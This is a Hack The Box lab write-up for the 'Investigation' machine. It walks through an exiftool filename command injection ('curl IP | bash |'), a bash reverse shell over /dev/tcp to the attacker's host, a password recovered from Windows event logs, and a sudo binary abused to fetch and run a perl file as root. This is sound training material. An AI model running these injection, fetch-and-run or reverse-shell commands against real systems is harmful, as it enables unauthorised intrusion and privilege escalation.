<!doctype html><html lang=en-us><head><title>Hackthebox Investigation | Achla | Inf0Sec</title><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge,chrome=1"><meta name=viewport content="width=device-width,minimum-scale=1"><meta name=description content="On Investigation we exploit an exiftool vulnerability from file upload that allow command execution and to gain a reverse shell.
Next we get credentials for one user from a mail text message. Finally, for root we have to do a little bit
of binary exploitation using ghidra."><meta name=generator content="Hugo 0.111.3"><meta name=ROBOTS content="NOINDEX, NOFOLLOW"><link rel=stylesheet href=/css/style.css><link rel="shortcut icon" href=/images/favicon.ico type=image/x-icon></head><body><nav class=navigation><a href=/><span class=arrow>←</span>Home</a>
<a href=/posts>Archive</a>
<a href=/about>About</a></nav><main class=main><section id=single><h1 class=title>Hackthebox Investigation</h1><div class=tip><time datetime="2023-01-25 14:44:57 +0100 +0100">Jan 25, 2023</time>
<span class=split>·</span>
<span>752 words</span>
<span class=split>·</span>
<span>4 minute read</span></div><aside class=toc><details><summary>Table of Contents</summary><div><nav id=TableOfContents><ul><li><a href=#nmap>Nmap</a></li><li><a href=#http80>HTTP:80</a></li><li><a href=#shell-as-smorton><strong>Shell as smorton</strong></a></li><li><a href=#shell-as-root><strong>Shell as root</strong></a></li></ul></nav></div></details></aside><div class=content><p>On Investigation we exploit an exiftool vulnerability from file upload that allow command execution and to gain a reverse shell.
Next we get credentials for one user from a mail text message. Finally, for root we have to do a little bit
of binary exploitation using ghidra.</p><h2 id=nmap>Nmap <a href=#nmap class=anchor>🔗</a></h2><p>As usual we start we some recon :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>nmap 10.129.139.235
</span></span><span style=display:flex><span>Nmap scan report for 10.129.139.235
</span></span><span style=display:flex><span>PORT    STATE SERVICE
</span></span><span style=display:flex><span>22/tcp  open  ssh
</span></span><span style=display:flex><span>80/tcp  open  http
</span></span></code></pre></div><h2 id=http80>HTTP:80 <a href=#http80 class=anchor>🔗</a></h2><p><p class=markdown-image><img src=/investigation_htb_web.png alt="image text"></p></p><p>Jumping on the website we see a free service which allow us to upload image file (png/jpg) :</p><p><p class=markdown-image><img src=/investigation_htb_upload.png alt="image text"></p></p><p>The output allows us to view exiftool&rsquo;s version number.</p><p><p class=markdown-image><img src=/investigation_htb_exif.png alt="image text"></p></p><p>The version is 12.39 and it seems that it&rsquo;s vulnerable to command injection through a crafted filename.
If the filename passed to exiftool ends with a pipe character <code>|</code> and exists on the filesystem,
then the file will be treated as a pipe and executed as an OS command.</p><p>The proof of concept can be found <strong><a href=https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429 target=_blank rel=noopener>here</a></strong>.
Now all we have to do is to rename our image file with one linux command add the pipe at the end :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>mv image.png &#39;curl IP | bash |&#39;
</span></span></code></pre></div><p>Next we need to create and index.html file, put a bash reverse shell in it and host our file using python :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>cat index.html
</span></span><span style=display:flex><span>bash -i &gt;&amp; /dev/tcp/IP/6666 0&gt;&amp;1
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>python3 -m http.server 80
</span></span></code></pre></div><p>Setup a netcat listener and let&rsquo;s go :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nc -lnvp <span style=color:#666>6666</span>
</span></span><span style=display:flex><span>Listening on 0.0.0.0 <span style=color:#666>6666</span>
</span></span><span style=display:flex><span>Connection received on 10.129.139.235
</span></span><span style=display:flex><span>www-data@investigation:~/uploads/1674415004$ id
</span></span><span style=display:flex><span><span style=color:#b8860b>uid</span><span style=color:#666>=</span>33<span style=color:#666>(</span>www-data<span style=color:#666>)</span> <span style=color:#b8860b>gid</span><span style=color:#666>=</span>33<span style=color:#666>(</span>www-data<span style=color:#666>)</span> <span style=color:#b8860b>groups</span><span style=color:#666>=</span>33<span style=color:#666>(</span>www-data<span style=color:#666>)</span>
</span></span></code></pre></div><h2 id=shell-as-smorton><strong>Shell as smorton</strong> <a href=#shell-as-smorton class=anchor>🔗</a></h2><p>There is a Windows Event Logs message file owned by smorton in <code>usr/local/investigation</code>.
Transfer the mail on our machine and open it with outlook :</p><p><p class=markdown-image><img src=/mail_investigation.png alt="image text"></p></p><p>We can see that there is a zip file in attachment. After unziping it, I got an EVTX file, a Windows XML EventLog file.
To analyze the file I choose : <strong><a href=https://github.com/omerbenamram/evtx target=_blank rel=noopener>EVTX</a></strong>.</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>┌──<span style=color:#666>(</span>kali㉿kali<span style=color:#666>)</span>-<span style=color:#666>[</span>~/Documents/htb/box/investigation<span style=color:#666>]</span>
</span></span><span style=display:flex><span>└─$ ./evtx_dump-v0.8.0-x86_64-unknown-linux-gnu -f output_evtx -o json security.evtx
</span></span></code></pre></div><p>The output contains a lot of rows so lets filter it :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>┌──<span style=color:#666>(</span>kali㉿kali<span style=color:#666>)</span>-<span style=color:#666>[</span>~/Documents/htb/box/investigation<span style=color:#666>]</span>
</span></span><span style=display:flex><span>└─$ grep TargetUserName evtx_ouput | sort -u &gt; sorted.txt
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>┌──<span style=color:#666>(</span>kali㉿kali<span style=color:#666>)</span>-<span style=color:#666>[</span>~/Documents/htb/box/investigation<span style=color:#666>]</span>
</span></span><span style=display:flex><span>└─$ head -n <span style=color:#666>11</span> sorted.txt
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>-<span style=color:#b62;font-weight:700>\&#34;</span>,
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>aanderson<span style=color:#b62;font-weight:700>\&#34;</span>,
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>AAnderson<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>AAnderson<span style=color:#b62;font-weight:700>\&#34;</span>,
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>Administrator<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>Administrators<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>AWright<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>Backup Operators<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>BMay<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>DefaultAccount<span style=color:#b62;font-weight:700>\&#34;</span>
</span></span><span style=display:flex><span>      <span style=color:#b62;font-weight:700>\&#34;</span>TargetUserName<span style=color:#b62;font-weight:700>\&#34;</span>: <span style=color:#b62;font-weight:700>\&#34;</span>Def@ultf0r3nz!csPa<span style=color:#b8860b>$$</span><span style=color:#b62;font-weight:700>\&#34;</span>,
</span></span></code></pre></div><p>I noticed <code>Def@ultf0r3nz!csPa$$</code> it seems like a password so let&rsquo;s try it to ssh to smorton user :</p><p><p class=markdown-image><img src=/ssh_investigation.png alt="image text"></p></p><p>And it works, let&rsquo;s switch to the root part now.</p><h2 id=shell-as-root><strong>Shell as root</strong> <a href=#shell-as-root class=anchor>🔗</a></h2><p>By looking at privileges sudoers we can see a binary called binary :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>smorton@investigation:~$ sudo -l
</span></span><span style=display:flex><span>Matching Defaults entries <span style=color:#a2f;font-weight:700>for</span> smorton on investigation:
</span></span><span style=display:flex><span>    <span style=color:#b8860b>secure_path</span><span style=color:#666>=</span>/usr/local/bin<span style=color:#b62;font-weight:700>\:</span>/usr/sbin<span style=color:#b62;font-weight:700>\:</span>/usr/bin<span style=color:#b62;font-weight:700>\:</span>/sbin<span style=color:#b62;font-weight:700>\:</span>/bin<span style=color:#b62;font-weight:700>\:</span>/snap/bin
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>User smorton may run the following commands on investigation:
</span></span><span style=display:flex><span>    <span style=color:#666>(</span>root<span style=color:#666>)</span> NOPASSWD: /usr/bin/binary
</span></span><span style=display:flex><span>smorton@investigation:~$
</span></span></code></pre></div><p>With the help of ghidra we can open the binary and open the main function :</p><p><p class=markdown-image><img src=/ghidra_investigation.png alt="image text"></p></p><p>In one part of the code we can see that verifies that the total of parameters is 3, means that in addition to the binary we need another 2 parameters :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#a2f;font-weight:700>if</span> <span style=color:#666>(</span>param_1 !<span style=color:#666>=</span> 3<span style=color:#666>)</span> <span style=color:#666>{</span>
</span></span><span style=display:flex><span>  puts<span style=color:#666>(</span><span style=color:#b44>&#34;Exiting... &#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  exit<span style=color:#666>(</span>0<span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#666>}</span>
</span></span></code></pre></div><p>Also elsewhere we can see that compares the uid is equal to 0 (root who runs it), if the condition fails does exactly the same as before</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#b8860b>_Var1</span> <span style=color:#666>=</span> getuid<span style=color:#666>()</span>;
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>if</span> <span style=color:#666>(</span>_Var1 !<span style=color:#666>=</span> 0<span style=color:#666>)</span> <span style=color:#666>{</span>
</span></span><span style=display:flex><span>  puts<span style=color:#666>(</span><span style=color:#b44>&#34;Exiting... &#34;</span><span style=color:#666>)</span>
</span></span><span style=display:flex><span>  exit<span style=color:#666>(</span>0<span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#666>}</span>
</span></span></code></pre></div><p>Elsewhere we can see that verifies that the second parameter is <code>lDnxUysaQn</code> if the condition is not met also does the same as before :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#b8860b>iVar2</span> <span style=color:#666>=</span> strcmp<span style=color:#666>(</span>*<span style=color:#666>(</span>char **<span style=color:#666>)(</span>param_2 + 0x10<span style=color:#666>)</span>,<span style=color:#b44>&#34;lDnxUysaQn&#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>if</span> <span style=color:#666>(</span>iVar2 !<span style=color:#666>=</span> 0<span style=color:#666>)</span> <span style=color:#666>{</span>
</span></span><span style=display:flex><span>  puts<span style=color:#666>(</span><span style=color:#b44>&#34;Exiting... &#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  exit<span style=color:#666>(</span>0<span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#666>}</span>
</span></span></code></pre></div><p>If the conditions are met use the curl function to read a file from a web resource that we can specify in the first parameter and save it in the open file :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>puts<span style=color:#666>(</span><span style=color:#b44>&#34;Running... &#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#b8860b>__stream</span> <span style=color:#666>=</span> fopen<span style=color:#666>(</span>*<span style=color:#666>(</span>char **<span style=color:#666>)(</span>param_2 + 0x10<span style=color:#666>)</span>,<span style=color:#b44>&#34;wb&#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#b8860b>uVar3</span> <span style=color:#666>=</span> curl_easy_init<span style=color:#666>()</span>;
</span></span><span style=display:flex><span>curl_easy_setopt<span style=color:#666>(</span>uVar3,0x2712,*<span style=color:#666>(</span>undefined8 *<span style=color:#666>)(</span>param_2 + 8<span style=color:#666>))</span>;
</span></span><span style=display:flex><span>curl_easy_setopt<span style=color:#666>(</span>uVar3,0x2711,__stream<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>curl_easy_setopt<span style=color:#666>(</span>uVar3,0x2d,1<span style=color:#666>)</span>;
</span></span><span style=display:flex><span><span style=color:#b8860b>iVar2</span> <span style=color:#666>=</span> curl_easy_perform<span style=color:#666>(</span>uVar3<span style=color:#666>)</span>;
</span></span></code></pre></div><p>If at this point you follow the stream, you will run the saved web resource file with perl :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#a2f;font-weight:700>if</span> <span style=color:#666>(</span><span style=color:#b8860b>iVar2</span> <span style=color:#666>==</span> 0<span style=color:#666>)</span> <span style=color:#666>{</span>
</span></span><span style=display:flex><span>  <span style=color:#b8860b>iVar2</span> <span style=color:#666>=</span> snprintf<span style=color:#666>((</span>char *<span style=color:#666>)</span>0x0,0,<span style=color:#b44>&#34;%s&#34;</span>,*<span style=color:#666>(</span>undefined8 *<span style=color:#666>)(</span>param_2 + 0x10<span style=color:#666>))</span>;
</span></span><span style=display:flex><span>  <span style=color:#b8860b>__s</span> <span style=color:#666>=</span> <span style=color:#666>(</span>char *<span style=color:#666>)</span>malloc<span style=color:#666>((</span>long<span style=color:#666>)</span>iVar2 + 1<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  snprintf<span style=color:#666>(</span>__s,<span style=color:#666>(</span>long<span style=color:#666>)</span>iVar2 + 1,<span style=color:#b44>&#34;%s&#34;</span>,*<span style=color:#666>(</span>undefined8 *<span style=color:#666>)(</span>param_2 + 0x10<span style=color:#666>))</span>;
</span></span><span style=display:flex><span>  <span style=color:#b8860b>iVar2</span> <span style=color:#666>=</span> snprintf<span style=color:#666>((</span>char *<span style=color:#666>)</span>0x0,0,<span style=color:#b44>&#34;perl ./%s&#34;</span>,__s<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  <span style=color:#b8860b>__s_00</span> <span style=color:#666>=</span> <span style=color:#666>(</span>char *<span style=color:#666>)</span>malloc<span style=color:#666>((</span>long<span style=color:#666>)</span>iVar2 + 1<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  snprintf<span style=color:#666>(</span>__s_00,<span style=color:#666>(</span>long<span style=color:#666>)</span>iVar2 + 1,<span style=color:#b44>&#34;perl ./%s&#34;</span>,__s<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  fclose<span style=color:#666>(</span>__stream<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  curl_easy_cleanup<span style=color:#666>(</span>uVar3<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  setuid<span style=color:#666>(</span>0<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  system<span style=color:#666>(</span>__s_00<span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  system<span style=color:#666>(</span><span style=color:#b44>&#34;rm -f ./lDnxUysaQn&#34;</span><span style=color:#666>)</span>;
</span></span><span style=display:flex><span>  <span style=color:#a2f;font-weight:700>return</span> 0;
</span></span><span style=display:flex><span><span style=color:#666>}</span>
</span></span></code></pre></div><p>To exploit this, we create a perl file that runs &lsquo;su&rsquo; and share it</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>cat exploit.pl
</span></span><span style=display:flex><span>exec<span style=color:#666>(</span><span style=color:#b44>&#34;su&#34;</span><span style=color:#666>)</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>sudo python3 -m http.server <span style=color:#666>80</span>
</span></span><span style=display:flex><span>Serving HTTP on 0.0.0.0 port <span style=color:#666>80</span> <span style=color:#666>(</span>http://0.0.0.0:80/<span style=color:#666>)</span> ...
</span></span></code></pre></div><p>Finally we run the binary with the arguments we know we need and when we run its launches a bash as root :</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>smorton@investigation:~$ sudo binary http://10.10.14.84/exploit.pl lDnxUysaQn
</span></span><span style=display:flex><span>Running...
</span></span><span style=display:flex><span>root@investigation:~# id
</span></span><span style=display:flex><span><span style=color:#b8860b>uid</span><span style=color:#666>=</span>0<span style=color:#666>(</span>root<span style=color:#666>)</span> <span style=color:#b8860b>gid</span><span style=color:#666>=</span>0<span style=color:#666>(</span>root<span style=color:#666>)</span> <span style=color:#b8860b>groups</span><span style=color:#666>=</span>0<span style=color:#666>(</span>root<span style=color:#666>)</span>
</span></span></code></pre></div></div></section></main><footer id=footer><div id=social><a class=symbol href=https://github.com/achla95 rel=me target=_blank><svg fill="#bbb" width="28" height="28" viewBox="0 0 72 72" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><title>Github</title><desc>Created with Sketch.</desc><defs/><g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><g id="Social-Icons---Rounded-Black" transform="translate(-264.000000, -939.000000)"><g id="Github" transform="translate(264.000000, 939.000000)"><path d="M8 72H64c4.418278.0 8-3.581722 8-8V8c0-4.418278-3.581722-8-8-8H8c-4.418278 811624501e-24-8 3.581722-8 8V64c541083001e-24 4.418278 3.581722 8 8 8z" id="Rounded" fill="#bbb"/><path d="M35.9985 13C22.746 13 12 23.7870921 12 37.096644c0 10.6440272 6.876 19.6751861 16.4145 22.8617681C29.6145 60.1797862 30.0525 59.4358488 30.0525 58.7973276 30.0525 58.2250681 30.0315 56.7100863 30.0195 54.6996482c-6.6765 1.4562499-8.085-3.2302544-8.085-3.2302544-1.0905-2.7829884-2.664-3.5239139-2.664-3.5239139C17.091 46.4500754 19.4355 46.4801943 19.4355 46.4801943c2.4075.1701719 3.675 2.4833051 3.675 2.4833051 2.142 3.6820383 5.6175 2.6188404 6.9855 2.0014024C30.3135 49.4077535 30.9345 48.3460615 31.62 47.7436831 26.2905 47.1352808 20.688 45.0691228 20.688 35.8361671c0-2.6308879.9345-4.781379 2.4705-6.4665327C22.911 28.7597262 22.0875 26.3110578 23.3925 22.9934585c0 0 2.016-.6475568 6.6 2.4697516C31.908 24.9285993 33.96 24.6620468 36.0015 24.6515052 38.04 24.6620468 40.0935 24.9285993 42.0105 25.4632101c4.581-3.1173084 6.5925-2.4697516 6.5925-2.4697516C49.9125 26.3110578 49.089 28.7597262 48.8415 29.3696344 50.3805 31.0547881 51.309 33.2052792 51.309 35.8361671c0 9.2555448-5.6115 11.29309-10.9575 11.8894446.860999999999997.7439374 1.629 2.2137408 1.629 4.4621184C41.9805 55.4089489 41.9505 58.0067059 41.9505 58.7973276 41.9505 59.4418726 42.3825 60.1918338 43.6005 59.9554002 53.13 56.7627944 60 47.7376593 60 37.096644 60 23.7870921 49.254 13 35.9985 13" fill="#fff"/></g></g></g></svg></a><a class=symbol href=https://twitter.com/achla95 rel=me target=_blank><svg fill="#bbb" width="28" height="28" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="438.536" height="438.536" viewBox="0 0 438.536 438.536" style="enable-background:new 0 0 438.536 438.536"><g><path d="M414.41 24.123C398.333 8.042 378.963.0 356.315.0H82.228C59.58.0 40.21 8.042 24.126 24.123 8.045 40.207.003 59.576.003 82.225v274.084c0 22.647 8.042 42.018 24.123 58.102 16.084 16.084 35.454 24.126 58.102 24.126h274.084c22.648.0 42.018-8.042 58.095-24.126 16.084-16.084 24.126-35.454 24.126-58.102V82.225C438.532 59.576 430.49 40.204 414.41 24.123zM335.471 168.735c.191 1.713.288 4.278.288 7.71.0 15.989-2.334 32.025-6.995 48.104-4.661 16.087-11.8 31.504-21.416 46.254-9.606 14.749-21.074 27.791-34.396 39.115-13.325 11.32-29.311 20.365-47.968 27.117-18.648 6.762-38.637 10.143-59.953 10.143-33.116.0-63.76-8.952-91.931-26.836 4.568.568 9.329.855 14.275.855 27.6.0 52.439-8.565 74.519-25.7-12.941-.185-24.506-4.179-34.688-11.991-10.185-7.803-17.273-17.699-21.271-29.691 4.947.76 8.658 1.137 11.132 1.137 4.187.0 9.042-.76 14.56-2.279-13.894-2.669-25.598-9.562-35.115-20.697-9.519-11.136-14.277-23.84-14.277-38.114v-.571c10.085 4.755 19.602 7.229 28.549 7.422-17.321-11.613-25.981-28.265-25.981-49.963.0-10.66 2.758-20.747 8.278-30.264 15.035 18.464 33.311 33.213 54.816 44.252 21.507 11.038 44.54 17.227 69.092 18.558-.95-3.616-1.427-8.186-1.427-13.704.0-16.562 5.853-30.692 17.56-42.399 11.703-11.706 25.837-17.561 42.394-17.561 17.515.0 32.079 6.283 43.688 18.846 13.134-2.474 25.892-7.33 38.26-14.56-4.757 14.652-13.613 25.788-26.55 33.402 12.368-1.716 23.88-4.95 34.537-9.708C357.458 149.793 347.462 160.166 335.471 168.735z"/></g></svg></a></div><div class=copyright>© Copyright
2023
<span class=split><svg fill="#bbb" width="15" height="15" id="heart-15" xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 15 15"><path d="M13.91 6.75c-1.17 2.25-4.3 5.31-6.07 6.94-.1903.1718-.4797.1718-.67.0C5.39 12.06 2.26 9 1.09 6.75-1.48 1.8 5-1.5 7.5 3.45 10-1.5 16.48 1.8 13.91 6.75z"/></svg></span>Achla</div></footer></body></html>